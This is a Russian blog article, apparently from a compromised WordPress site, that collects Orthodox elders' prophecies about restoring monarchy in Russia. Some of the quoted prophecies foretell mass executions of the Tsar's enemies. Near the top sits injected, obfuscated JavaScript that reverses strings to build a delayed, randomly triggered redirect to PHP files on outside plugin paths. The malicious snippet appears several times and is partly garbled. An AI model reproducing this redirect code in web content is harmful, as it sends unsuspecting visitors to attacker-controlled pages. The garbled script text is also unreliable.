Монархия Россия/Русь

О восстановлении монархии в России


$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor has-alpha-channel-opacity»/>

О восстановлении монархии в России давно идут разговоры, как в самой России, так и за её пределами. Эта тема активно обсуждается в России. Существуют два противоположных мнения.

В этой статье я не буду дискутировать о необходимости или ненужности установления монархического строя в России. Цель статьи показать пророчества старцев о восстановлении монархии в России после долгих лет забвения. Выводы делать вам, уважаемые читатели.

Итак, наверное, самый плодотворный пророк возвестивший о будущем России был преподобный Серафим Саровский (+1833), чье прославление произошло в 1903 году Государем Николаем II, несмотря на возражение членов Святейшего Синода. За несколько десятилетий до этого, во многом эпохального события…

Серафим Саровский говорил:

«Будет некогда Царь, который меня прославит, после чего будет великая смута на Руси, много крови потечет за то, что восстанут против этого Царя и Его Самодержавия. Но Бог Царя возвеличит.»

Начало этому пророчеству было положено в 1903 году. Тогда государь написал: «Немедленно прославить», имея в виду Серафима Саровского. Дальше больше. Серафим предсказал, что будет торжество великое и радость, когда царская семья приедет в Саров и Дивеево и воспоёт Пасху. И это… летом! Предсказание это оканчивается описанием скорбного пути России, испытаний, которые выпадут на её долю: «А что после будет — ангелы не будут успевать принимать души».

Так и случилось. Цари действительно посетили Саров и Дивеево в 1903 году, в дни открытия мощей преподобного. Государь с архиереями нёс раку со святыми мощами, и народ пел в великой радости Пасху.

А что вторая часть предсказания? Все знают, что она стала скорбной и ужасной реальностью.

Но заканчиваются ли на этом предсказания старца? Помните окончание пророчества? «Но Бог Царя возвеличит!»

Вот ещё несколько пророчеств о России.

Антоний Савваит (+1964):

«В России в это время будет православный Царь, которого Господь явит русскому народу. И после этого мир опять развратится и не будет уже способен к исправлению, тогда попустит Господь воцарение антихриста.»

Преп. Серафим Саровский (+1833):

«Господь помилует Россию и приведет ее путем страданий к великой славе. Перед концом времен Россия сольётся в одно море великое с прочими землями и племенами славянскими, она составит одно море или тот громадный вселенский океан народный, о коем Господь Бог издревле изрёк устами Святых: «Грозное и непобедимое Царство Всероссийское, Всеславянское Гога и Магога, пред которым в трепете будут все народы».

Иеромонах Агафангел (+X век):

«Константин основал, и Константин потеряет царство Византийское. Но не бойся: как древле народ Израильский покорен был Навуходоносором, так и народ Греческий будет под властью нечестивых Агарян до определенного времени и пребудет под игом до исполнения четырехсот лет. Царь Русый восстановит в Византии победоносное знамение Христово и сокрушит силу Измаильтян.»

Феофан Полтавский (+1940):

«В России будет восстановлена Монархия, Самодержавная власть. Господь предызбрал будущего Царя. Это будет человек пламенной веры, гениального ума и железной воли. Он прежде всего, наведет порядок в Церкви Православной, удалив всех неистинных, еретичествующих и теплохладных архиереев. И многие, очень многие, за малыми исключениями, почти все будут устранены, а новые, истинные, непоколебимые архиереи станут на их место.»

Преп. Серафим Саровский (+1833):

«Когда Земля Русская разделится и одна сторона явно останется с бунтовщиками, другая же явно станет за Государя и целость России, вот тогда Господь поможет правому делу – ставших за Государя и Отечество и Святую Церковь нашу – и даст полную победу поднявшим оружие за Него, за Церковь и за благо нераздельности Земли Русской. Но не столько и тут крови прольется, сколько тогда, когда правая за Государя ставшая сторона получит победу и переловит по всему миру Царских изменников и врагов Христа и предаст их в руки правосудия, тогда уже никого в Сибирь не пошлют, а всех казнят, и вот тут – то еще более прежнего крови прольется, но эта кровь будет последняя очистительная кровь.»

Как относится к этим словам – решать каждому лично. Но, как уже было не раз показано в блогах этого сайта, Библия вполне определённо указывает на Россию, как на одного из царей с Востока.

См. больше информации о словах Серафима Саровского про Россию.

Автор: Жиганков О.А.

Поделитесь своими мыслями ниже, в комментариях.

Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.

***

Поддержать служение

«Солёного радио», — сайт, YouTube канал, архив Яндекс Диска, — можно перечислив любую сумму на карту Сбер 4276 6600 1073 3772 (Дмитрий Александрович Б.). В сообщении можно написать просто «СР».

***

Мы в соцсетях

Солёное радиоTelegram, YouTube, ВКонтакте, Яндекс Дзен

Международный Телеграмм чат «Возвращение домой — общение православных и протестантов

You Might Also Like

No Comments

    Leave a Reply

    Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.